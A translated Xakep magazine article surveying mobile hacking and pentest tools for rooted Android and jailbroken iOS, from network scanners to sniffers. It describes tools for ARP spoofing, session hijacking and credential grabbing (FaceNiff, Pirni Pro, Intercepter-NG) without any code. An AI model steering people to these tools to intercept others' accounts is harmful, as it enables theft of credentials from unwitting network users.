This article was published in “Xakep” #165 magazine.
Original russian version - PDF
Combat Smartphone
A smartphone equipped with hacking tools? Until recently, we would have said such a thing didn’t exist. It was only possible to run familiar attack tools on something like Maemo. However, many tools have now been ported to iOS and Android, and some hack tools have been specially written for mobile environments. Can a smartphone replace a laptop in penetration testing? We decided to find out.
How to Turn Your iOS/Android Device into a Hacking Tool
Android
Android is a popular platform not only for everyday users but also for tech-savvy individuals. The number of useful tools available is overwhelming, thanks to the UNIX roots of the system, which have made porting many tools to Android much easier. Unfortunately, some of these tools are not allowed on the Google Play Store, so you’ll need to manually install the appropriate APKs. Additionally, some tools require root access to the system (for example, the iptables firewall), so you should ensure you have root access beforehand. Each manufacturer uses its own technology for this, but finding the necessary instructions is quite simple. A good collection of HOWTOs can be found on LifeHacker. If you can’t find your model there, the XDA-Developers forum always comes to the rescue, offering various information on almost any Android phone model. That said, some of the tools described below will work even without root access.
BotBrew
BotBrew is an unusual package manager. The developers call it “utilities for superusers,” and this is not far from the truth. After installing BotBrew, you get a repository from which you can download a vast number of tools compiled for Android. These include Python and Ruby interpreters for running various tools written in these languages, the tcpdump sniffer and Nmap scanner for network analysis, Git and Subversion for version control systems, and much more.
PIPS
PIPS is a specially adapted, albeit unofficial, port of the Nmap scanner for Android. It allows you to quickly find active devices on the network, determine their operating systems using fingerprinting options, perform port scans, and essentially do everything that Nmap is capable of.
Fing
Fing is a network scanner that, unlike Nmap, offers a more user-friendly interface for mobile devices. It quickly scans the network, performs fingerprinting, and displays a list of all available devices, categorizing them by type (router, desktop, iPhone, etc.). It also allows you to view open ports for each host and connect to services such as FTP using the built-in FTP client.
NetAudit
NetAudit works on any Android device (even non-rooted) and allows you to quickly identify devices on the network and investigate them using a large fingerprinting database to determine the operating system and CMS systems used on web servers.
Net Tools
Net Tools is an indispensable tool for system administrators, containing over 15 utilities such as ping, traceroute, arp, dns, netstat, and route for network diagnostics.
Shark for Root
Shark for Root is a sniffer based on tcpdump that logs all data to a pcap file, which can then be analyzed using familiar tools like Wireshark or Network Miner. It is mainly used for analyzing one’s own traffic, making it a great way to study what programs installed on your device from dubious repositories are transmitting.
FaceNiff
FaceNiff is one of the most infamous Android hacking tools, capable of intercepting and injecting into captured web sessions. After downloading the APK package, you can use this hacking tool on almost any Android smartphone to intercept accounts from various services such as Facebook, Twitter, VKontakte, and more. The session hijacking is performed using ARP spoofing, but it only works on unencrypted connections.
iOS
iOS is also popular among security tool developers. However, on Apple devices, jailbreaking is almost always necessary to gain root access. Fortunately, there are tools available for jailbreaking even the latest firmware versions. Along with full access, you also get the alternative application manager Cydia, which already contains many useful tools.
MobileTerminal
MobileTerminal is a terminal emulator that supports multiple terminals, gestures for control (e.g., for sending <Ctrl + C>), and is overall very well-designed.
Pirni & Pirni Pro
Pirni is the first full-fledged sniffer for iOS. It uses classic ARP spoofing to capture all traffic through the device. Pirni Pro, the advanced version, features a graphical interface and can parse HTTP traffic on the fly, automatically extracting interesting data such as login credentials using regular expressions set in the settings.
Intercepter-NG (console edition)
Intercepter-NG is a well-known sniffer that now has a console version for iOS and Android. It features password grabbing for various protocols, intercepting messenger messages, and resurrecting files from traffic. It also includes network scanning and quality ARP Poison capabilities.
Ettercap-NG
Ettercap-NG is a complex tool for MITM attacks that has been ported to iOS. It includes etterlog, which helps extract useful information from traffic dumps, such as FTP accounts.
iSSH
iSSH is an SSH client that provides a secure connection and the ability to create SSH tunnels.
These are just a few examples of the numerous tools available for turning your smartphone into a powerful hacking device. Whether you are using Android or iOS, with the right tools and a bit of setup, you can perform a variety of penetration testing tasks directly from your mobile device.